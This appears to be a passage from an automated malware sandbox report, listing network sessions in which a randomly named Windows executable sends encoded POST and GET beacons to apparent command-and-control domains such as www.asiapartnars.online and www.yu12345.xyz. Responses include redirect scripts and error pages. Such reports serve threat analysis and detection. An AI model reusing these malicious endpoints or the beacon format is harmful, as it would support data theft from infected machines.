                                                                                                                                                        Data Ascii: ZrE=x3I+P9MmuXmedqUv3BllKAFetH8b3N1BqaqcAqP5epUvtsHs7yLol/fcWqTe5ueVvjEYLXOpSbjP/94vDYMWcvraI6g8r/2M1hAC63pReoPSawyzj4K93t6Fjp4rznsMht8RNGSD+OAPTzARKGosARmJVbyQ/25hZFeaxeNAxKwk3hrTsgFypJLQ0qJFfmrawVX4JmtXlXO0DoxBr0nu0U0008sFHsFKb770vJE1bF9174Wu0ZlYACKI4L2L+a1UCl9DKpKeKT2gWToYZH9WwK6l+qxoP5X8+Dh0bZSZcqXDVw6qAD4DoQXMtRQ88133ESAH+w9iCepuNEQIDuQzGXSwg2zkZybxQsBORBFWpPR5d8/jKjp8uSVW9JXqWDf2s40oDojfYfJU6C7qjackqnDDkPCIcOz0Ndk0wktNKrmGpEcAql0rh7UBXKBY3W/Msir6O6EGH1vc3H+FVhPceMbj5w/Or1Ni0zZv/rI2Uz0YbchFYW5IdvkQ0n4eJ/DzgC3rSZzW8GRNsrqLGUnSTFQ5fJYv6bZyDymMWIjoduslS9GiNLod11zJYuEr8QhsR9hpi3YD2FdMyQ8GwHlXk/KgVc0n6D+J+x/ylX4GSxjA+fEh0QMP75/EoV/LZRiQ4BcQs0uaToIK2dJvnOmS6Hhoh5XsgHN70UOCFfzy8lQ3wmcokUNI8nY2RCHvbAd/DVtpS/gHNZ8gguAW/kzoPDSc5alt6kHulmXXiDxUqVjI2S0Qoq5d+h+OQ5nI2BP2B/X3kEvUm9K5eYYwIB6YnqDH8SeZrCHx/9HpEdOx98bSXDitvBNofmqq9POVxt4zp+HNQwBELyttJvc37LrRMS0E8qnau813WDJCux7AX4W11xyTwbXvCxEKT/dYZE5subtH+N/P2eExpIgLT0lrUYVxJqjSVbbnUG81/9M5FHPtOSF6folLi4h3uRwFqXTey6SK3yTpqkNHbGLrWAW5chIV6ZUeDx/S8rDH1OnVL1BzHwer [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        30192.168.2.6500183.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:46.853360891 CET557OUTGET /566f/?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.healthyloveforall.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:40:47.944267988 CET406INHTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:47 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 72 45 3d 38 31 67 65 4d 4a 73 35 6a 51 6d 56 65 4b 34 68 77 44 42 50 4b 48 42 47 76 6e 30 54 6d 37 5a 77 67 65 4f 6d 63 39 6a 54 55 36 46 79 33 38 44 7a 7a 47 6e 4a 39 38 44 55 65 59 37 44 32 70 79 75 32 58 77 58 5a 54 2b 37 58 4d 61 57 37 61 4d 4e 4d 72 45 7a 51 65 44 2f 46 37 46 54 6a 73 62 49 39 51 4e 48 6e 6b 64 36 41 72 6e 36 64 56 4c 75 72 35 65 57 77 39 6e 56 73 36 77 2f 31 45 59 76 6e 76 59 43 62 53 73 3d 26 4a 72 3d 74 6e 61 78 78 74 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx"}</script></head></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        31192.168.2.6500193.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:53.702259064 CET830OUTPOST /tkmh/ HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.asiapartnars.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.asiapartnars.online/tkmh/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 38 4e 48 58 64 6f 6d 41 6d 75 4c 6d 62 73 76 57 71 62 4d 42 55 58 43 69 6f 42 76 48 6d 4d 42 38 30 72 47 51 76 64 58 43 51 61 4a 47 4c 4e 58 38 2b 70 61 54 75 52 67 6f 32 59 68 41 64 77 58 6d 54 59 39 38 67 53 63 49 70 64 66 64 46 66 62 39 79 63 73 75 6d 76 54 4a 63 62 31 39 59 37 4e 2b 30 75 49 46 54 69 4e 33 39 53 68 64 50 65 72 6c 41 78 32 54 6b 45 64 49 74 64 70 6f 6f 74 71 49 74 4a 35 72 65 52 41 77 38 49 39 48 30 6d 45 2f 50 51 6f 59 44 65 65 72 48 37 48 45 56 76 73 79 47 42 5a 47 30 78 72 79 6b 75 46 57 64 4c 47 2f 6c 42 55 7a 46 36 59 6e 53 30 68 66 2b 30 78 70 68 4b 6b 70 63 2f 6f 49 4c 4a 43 32
                                                                                                                                                        Data Ascii: ZrE=8NHXdomAmuLmbsvWqbMBUXCioBvHmMB80rGQvdXCQaJGLNX8+paTuRgo2YhAdwXmTY98gScIpdfdFfb9ycsumvTJcb19Y7N+0uIFTiN39ShdPerlAx2TkEdItdpootqItJ5reRAw8I9H0mE/PQoYDeerH7HEVvsyGBZG0xrykuFWdLG/lBUzF6YnS0hf+0xphKkpc/oILJC2


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        32192.168.2.6500203.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:56.362474918 CET854OUTPOST /tkmh/ HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.asiapartnars.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.asiapartnars.online/tkmh/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 38 4e 48 58 64 6f 6d 41 6d 75 4c 6d 59 50 6e 57 74 35 6b 42 66 58 43 68 6c 52 76 48 30 4d 42 77 30 72 4b 51 76 63 53 5a 52 6f 39 47 4c 6f 72 38 39 72 79 54 6e 42 67 6f 35 34 68 2f 65 41 58 62 54 59 68 4f 67 53 67 49 70 64 6a 64 46 66 4c 39 79 73 51 68 6b 2f 54 4c 61 62 31 2f 63 37 4e 2b 30 75 49 46 54 69 5a 4e 39 53 4a 64 49 75 62 6c 53 6c 69 51 74 6b 63 36 75 64 70 6f 73 74 71 54 74 4a 34 4d 65 51 4d 57 38 4f 35 48 30 6e 30 2f 4d 46 55 48 5a 4f 65 70 4c 72 47 6e 45 61 64 37 66 67 55 35 39 7a 37 47 37 75 5a 36 59 39 48 6c 35 79 55 51 58 71 34 6c 53 32 35 74 2b 55 78 44 6a 4b 63 70 4f 6f 6b 76 45 39 6e 56 57 6e 38 6d 73 2f 49 4c 6f 41 6f 41 74 76 2b 4c 78 6b 42 6c 2f 77 3d 3d
                                                                                                                                                        Data Ascii: ZrE=8NHXdomAmuLmYPnWt5kBfXChlRvH0MBw0rKQvcSZRo9GLor89ryTnBgo54h/eAXbTYhOgSgIpdjdFfL9ysQhk/TLab1/c7N+0uIFTiZN9SJdIublSliQtkc6udpostqTtJ4MeQMW8O5H0n0/MFUHZOepLrGnEad7fgU59z7G7uZ6Y9Hl5yUQXq4lS25t+UxDjKcpOokvE9nVWn8ms/ILoAoAtv+LxkBl/w==


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        33192.168.2.6500213.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:59.018286943 CET1867OUTPOST /tkmh/ HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.asiapartnars.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.asiapartnars.online/tkmh/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 38 4e 48 58 64 6f 6d 41 6d 75 4c 6d 59 50 6e 57 74 35 6b 42 66 58 43 68 6c 52 76 48 30 4d 42 77 30 72 4b 51 76 63 53 5a 52 6f 46 47 4b 65 2f 38 76 4b 79 54 31 52 67 6f 77 59 68 2b 65 41 58 38 54 59 35 4b 67 53 74 2f 70 62 6e 64 48 39 7a 39 6a 2f 49 68 2b 76 54 4c 59 62 31 36 59 37 4d 71 30 75 5a 43 54 69 4a 4e 39 53 4a 64 49 73 44 6c 43 42 32 51 68 45 64 49 74 64 70 53 6f 74 72 64 74 4a 78 7a 65 51 4a 72 2f 2b 5a 48 33 45 63 2f 63 6e 38 48 53 4f 65 76 4b 62 47 42 45 61 5a 34 66 67 4a 43 39 32 47 52 37 76 68 36 61 63 37 6d 75 54 5a 47 4c 4c 4a 41 44 6b 42 4d 32 45 30 77 71 34 6b 36 64 72 67 75 4e 75 4c 66 51 53 77 44 69 4e 42 6d 6d 78 6c 75 7a 35 4c 38 6c 48 39 68 71 2f 4f 6a 51 6f 64 45 37 70 32 35 53 69 68 4d 53 32 39 50 54 47 4f 45 44 39 69 31 42 44 4e 52 71 6a 72 57 57 48 70 49 69 77 66 77 78 69 6a 72 5a 7a 39 57 30 63 42 6f 6e 4e 78 67 41 45 30 46 6e 34 54 76 2f 49 79 2f 71 6f 73 6e 49 72 73 4c 7a 71 63 66 6d 50 55 43 33 52 5a 58 67 77 4e 4b 50 6c 42 59 61 66 50 67 6e 38 67 48 59 6e [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=8NHXdomAmuLmYPnWt5kBfXChlRvH0MBw0rKQvcSZRoFGKe/8vKyT1RgowYh+eAX8TY5KgSt/pbndH9z9j/Ih+vTLYb16Y7Mq0uZCTiJN9SJdIsDlCB2QhEdItdpSotrdtJxzeQJr/+ZH3Ec/cn8HSOevKbGBEaZ4fgJC92GR7vh6ac7muTZGLLJADkBM2E0wq4k6drguNuLfQSwDiNBmmxluz5L8lH9hq/OjQodE7p25SihMS29PTGOED9i1BDNRqjrWWHpIiwfwxijrZz9W0cBonNxgAE0Fn4Tv/Iy/qosnIrsLzqcfmPUC3RZXgwNKPlBYafPgn8gHYnbyLGlTC+lY0pmIMPMQWIy5/CJhHvaVH5t9lGHJhfw0VFOWEUPypM1HVCmRN+7NSxDeOTYrcwx9A1DtUfQP1aFWGAVgyniboB0DvIrj7Tt1qcT+Xn7jWJ6x+JUG9k2QMQbpuyvdHtEeg+RUwf2l/FSu8YPCVzt2UkD120B0BwHXANW/jug1+2bAY69a3FNwIAKmrMBuG3f4z2ovroS0XnDDwgA9GZ1pI/HrWbnArDu0zkCvoR84Z0N2S51KQEgHZkJK3XFNQMNWyUk5IUH2CGQDa5ftt9s2E1PT6ZY/2tXwlWVxesvPsoY42Lzt0OEXR/aTP6JbN9nE7BSw0QNdGl2fI78Dmzujc57UiRo32ai5kSfGPW9PiHaXKjT9OWutqObyPVQ+hQJXfl7qp6xc33JBpwrlp0GsqbL6XJ3WKWfoRjrnmmgKEh2fJfB7PavcVLlbj1nztNF57sWkByqIuqZU2yVdWn8Xg15mAiYby4uZbCpFkWvUMNS7Jo7NyXOo8tOOqVe+l1dEA3fYuPTdvi3bHG20tAvQy+iXSbMKMiCCBLpg1k0cs649LoS81QcJGj1NMZUfgjr5OzF1Yef2DYWI8EDnkP5g+AhZIvCglDXDrcIxAxHCTKtdcp+iHTOjLWQKTFZm4dZNwR8zyfg+IE9tR4tV01kil5Q6 [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        34192.168.2.6500223.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:01.670289993 CET555OUTGET /tkmh/?Jr=tnaxxtx&ZrE=xPv3ed6Vo6P/OeD+soQOKhGtpyHDw/FO+ter//brXKVYevLLhvaYsARGwIBiS273ToVNwXlIv9TeCbPJyvYOrdDnTudDZaU/k/ECAD12ggB+I5+8DAynmnMMiOBcr//QwqdtWEY= HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:41:02.765264988 CET406INHTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:02 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 72 3d 74 6e 61 78 78 74 78 26 5a 72 45 3d 78 50 76 33 65 64 36 56 6f 36 50 2f 4f 65 44 2b 73 6f 51 4f 4b 68 47 74 70 79 48 44 77 2f 46 4f 2b 74 65 72 2f 2f 62 72 58 4b 56 59 65 76 4c 4c 68 76 61 59 73 41 52 47 77 49 42 69 53 32 37 33 54 6f 56 4e 77 58 6c 49 76 39 54 65 43 62 50 4a 79 76 59 4f 72 64 44 6e 54 75 64 44 5a 61 55 2f 6b 2f 45 43 41 44 31 32 67 67 42 2b 49 35 2b 38 44 41 79 6e 6d 6e 4d 4d 69 4f 42 63 72 2f 2f 51 77 71 64 74 57 45 59 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Jr=tnaxxtx&ZrE=xPv3ed6Vo6P/OeD+soQOKhGtpyHDw/FO+ter//brXKVYevLLhvaYsARGwIBiS273ToVNwXlIv9TeCbPJyvYOrdDnTudDZaU/k/ECAD12ggB+I5+8DAynmnMMiOBcr//QwqdtWEY="}</script></head></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        35192.168.2.650023154.82.100.177803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:08.779948950 CET806OUTPOST /mnl8/ HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.yu12345.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.yu12345.xyz/mnl8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 63 45 6d 77 4b 71 4c 38 41 6e 59 63 38 66 30 56 57 7a 54 43 74 5a 4d 47 66 48 44 32 36 55 35 2f 6d 71 59 72 72 53 39 37 32 68 39 56 56 75 61 74 57 71 73 69 49 6b 43 48 35 50 54 74 37 4a 54 4a 6a 52 52 30 74 70 6f 65 42 30 55 44 64 4b 49 6c 77 42 46 2b 57 66 32 68 57 4b 33 6b 48 4b 55 36 66 66 57 7a 73 72 51 31 65 75 4b 4a 49 78 4f 37 38 52 53 35 75 6d 52 68 47 65 6d 35 79 72 36 39 31 70 48 49 56 65 52 58 77 77 52 7a 62 72 39 4b 51 4b 46 56 33 6e 6f 52 69 59 79 41 35 53 72 45 63 76 50 34 2b 7a 63 4a 41 37 41 66 50 73 52 50 78 6a 42 5a 72 64 51 76 33 6f 52 41 48 36 2b 61 72 71 37 49 64 31 7a 56 43 30 52 79
                                                                                                                                                        Data Ascii: ZrE=cEmwKqL8AnYc8f0VWzTCtZMGfHD26U5/mqYrrS972h9VVuatWqsiIkCH5PTt7JTJjRR0tpoeB0UDdKIlwBF+Wf2hWK3kHKU6ffWzsrQ1euKJIxO78RS5umRhGem5yr691pHIVeRXwwRzbr9KQKFV3noRiYyA5SrEcvP4+zcJA7AfPsRPxjBZrdQv3oRAH6+arq7Id1zVC0Ry
                                                                                                                                                        Dec 5, 2024 05:41:10.299947023 CET1236INHTTP/1.1 410 Gone
                                                                                                                                                        Server: NgxFence
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:10 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 4303
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 31 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 69 62 73 2e 6a 73 68 75 62 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2d 31 32 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 69 62 73 2e 6a 73 68 75 62 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2d 31 32 2f 63 73 73 2f 73 6f 6c 69 64 2e 6d 69 6e 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 20 30 70 78 3b 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 66 [TRUNCATED]
                                                                                                                                                        Data Ascii: <html><head><title>410</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css' rel='stylesheet'><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css' rel='stylesheet'><style>body{margin: 0px;padding: 0px;font-family: Tahoma, Pingfang SC, Microsoft YaHei, SimSun;font-size: 12px;color: #353535;background-color: #efefef;}.brdiv {clear: both;width: 100%;height: 0px;line-height: 0px;padding: 0px;margin: 0px;border: none;background-color: transparent;background-image: none;}.mdiv{position: absolute;top: 50%;left: 50%;background-color: #fff;width: 800px;height: auto;transform: translate(-50%, -50%);box-shadow: 2px 5px 5px 2px #dfdfdf;padding-bottom: 20px;}.mtd{width: 100%; height: 10px; background-color: #376888;}.mid{margin: 0px auto; text-align: center; padding: 30px 0px; width: 750px; border-bottom: solid 1px #dfdfdf;}.miitm{width: 215px;float: left;font-size: 80px; [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:41:10.299994946 CET1236INData Raw: 67 68 74 3a 20 33 30 70 78 3b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 20 23 33 35 33 35 33 35 3b 7d 0a 2e 6d 69 69 74 6d 20 2e 66
                                                                                                                                                        Data Ascii: ght: 30px;float: left;font-size: 15px;font-weight: bold;color: #353535;}.miitm .fa-check-circle,.miitm .fa-times-circle,.miitm .fa-question-circle{font-size: 20px;position: absolute;bottom: 0px;right: 60px;}.mil{ width: 60px;height: 80px;flo
                                                                                                                                                        Dec 5, 2024 05:41:10.300005913 CET1236INData Raw: 3a 20 31 30 30 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 68 65 69 67 68 74 3a 20 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69
                                                                                                                                                        Data Ascii: : 100%; text-align:center; float: left;height: 25px;line-height: 25px;overflow: hidden;}a{text-decoration: none;}a:hover{text-decoration:underline;}a:visited{color: blue;}.reqid{font-family: monospace;font-weight: bold;}.mwm{z-index: -1;w
                                                                                                                                                        Dec 5, 2024 05:41:10.300031900 CET737INData Raw: 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 69 74 6d 22 3e 3c 6c 69 3e e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e5 9f 9f e5 90 8d e5 9c a8 e5 b9 b3 e5 8f b0 e4 b8 8a e6 9c aa e9 85 8d e7 bd ae e6 88 96 e8 80 85 e6 9c aa e7 94 9f e6 95 88 3c 2f 6c 69
                                                                                                                                                        Data Ascii: ><div class="oitm"><li></li></div><div class="brdiv"></div><div class="oitm"><li></li></div><div class="brdiv"></div></div><div class="omsg"><div


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        36192.168.2.650024154.82.100.177803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:11.438410997 CET830OUTPOST /mnl8/ HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.yu12345.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.yu12345.xyz/mnl8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 63 45 6d 77 4b 71 4c 38 41 6e 59 63 2f 38 73 56 55 51 72 43 6f 35 4e 30 42 33 44 32 67 6b 35 37 6d 72 6b 72 72 54 4a 72 32 54 4a 56 56 4c 6d 74 45 34 45 69 59 30 43 48 78 76 53 70 31 70 54 47 6a 52 63 4a 74 6f 45 65 42 77 30 44 64 4b 59 6c 77 77 46 35 57 50 32 6a 50 61 33 36 4a 71 55 36 66 66 57 7a 73 72 56 65 65 75 53 4a 49 69 57 37 75 6b 75 36 74 6d 52 69 57 75 6d 35 6b 72 37 32 31 70 48 36 56 66 4e 70 77 31 4e 7a 62 71 4e 4b 54 65 52 57 75 58 70 61 2f 49 79 53 30 79 57 67 45 70 61 36 78 54 34 2b 48 6f 46 34 48 36 51 56 74 51 42 36 35 4e 77 74 33 71 4a 79 48 61 2b 77 70 71 44 49 50 69 2f 79 4e 41 30 52 39 42 41 38 43 67 7a 50 58 43 30 6e 53 4a 38 54 33 65 74 67 53 41 3d 3d
                                                                                                                                                        Data Ascii: ZrE=cEmwKqL8AnYc/8sVUQrCo5N0B3D2gk57mrkrrTJr2TJVVLmtE4EiY0CHxvSp1pTGjRcJtoEeBw0DdKYlwwF5WP2jPa36JqU6ffWzsrVeeuSJIiW7uku6tmRiWum5kr721pH6VfNpw1NzbqNKTeRWuXpa/IyS0yWgEpa6xT4+HoF4H6QVtQB65Nwt3qJyHa+wpqDIPi/yNA0R9BA8CgzPXC0nSJ8T3etgSA==
                                                                                                                                                        Dec 5, 2024 05:41:12.966068029 CET1236INHTTP/1.1 410 Gone
                                                                                                                                                        Server: NgxFence
